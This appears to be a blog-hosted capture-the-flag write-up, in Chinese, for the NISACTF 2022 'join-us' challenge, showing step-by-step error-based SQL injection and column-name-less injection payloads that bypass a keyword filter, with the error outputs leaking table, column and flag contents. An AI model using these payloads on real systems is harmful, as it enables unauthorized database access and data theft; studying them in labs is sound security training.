[NISACTF 2022]join-us - 报错注入&无列名注入

点击登录,找到注入点

这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了

1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()#1' || (select * from aa)#

  FUNCTION sqlsql.a does not exist

2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#

  没拦截,说明可以试一下

3、1' || extractvalue(0,concat(0x7e,1,0x7e));#

  XPATH syntax error: '~ 1 ~',说明报错成功了

4、1' || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),1,30),0x7e));#

  XPATH syntax error: '~ Fal_flag,output ~'

5、1' || extractvalue(0,concat(0x7e,mid((select group_concat(column_name) from Fal_flag),1,100),0x7e));#

  不要耍小心思喔~ ------ column被waf,无列名注入

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag as a join Fal_flag as b)as c),1,100),0x7e));#

  不要耍小心思喔~ ------ as被waf,去掉as

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b) c),1,100),0x7e));#

  Duplicate column name 'id'

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id)) c),1,100),0x7e));#

  Duplicate column name 'data'

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id,data)) c),1,100),0x7e));#

  Duplicate column name 'i_tell_u_this_is_Fal(se)_flag_is_in_another' ------ flag在另一个表(output)

6、1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b) c),1,100),0x7e));#

  Duplicate column name 'data'

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),1,100),0x7e));#

  XPATH syntax error: '~ NSSCTF{77a4667a-b16e-46a6-87...'

  1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),20,100),0x7e));#

  XPATH syntax error: '~ e-46a6-87fc-f981f48eeb5c} ~'

相关推荐
程序员-Benothing34 分钟前
MySQL 的覆盖索引是什么?
数据库·mysql
数翊科技1 小时前
权威认可!HexaDB海纳分布式HTAP数据库通过CCRC EAL4增强级认证
数据库
星恒讯工业路由器1 小时前
MIMO与多天线技术:从5G到WiFi的工程解析
数据库·mysql·5g·工业物联网·mimo技术·天线隔离度·5g/wifi多天线
deepdata_cn1 小时前
向量数据库赋能研报智能分析、舆情检索、风险洞察
数据库·向量数据库
涤生大数据2 小时前
Flink Agents 深度剖析:这才是生产级 AI Agent 该有的底座!
数据库·人工智能
海上小飞龙2 小时前
Redis 持久化:RDB 与 AOF
数据库·redis·缓存
hold?fish:palm2 小时前
redis中AOF 重写机制解析
数据库·c++·redis
Minxinbb2 小时前
TDSQL for MySQL修改统计信息参数
数据库·dba
Nayxxu2 小时前
Gemini Computer Use 安全清单:浏览器、桌面、移动端自动化怎么控权限
运维·安全·自动化
2501_937860942 小时前
MySQL数据库入门|从零搞懂数据库基础、架构与存储引擎
数据库·mysql·架构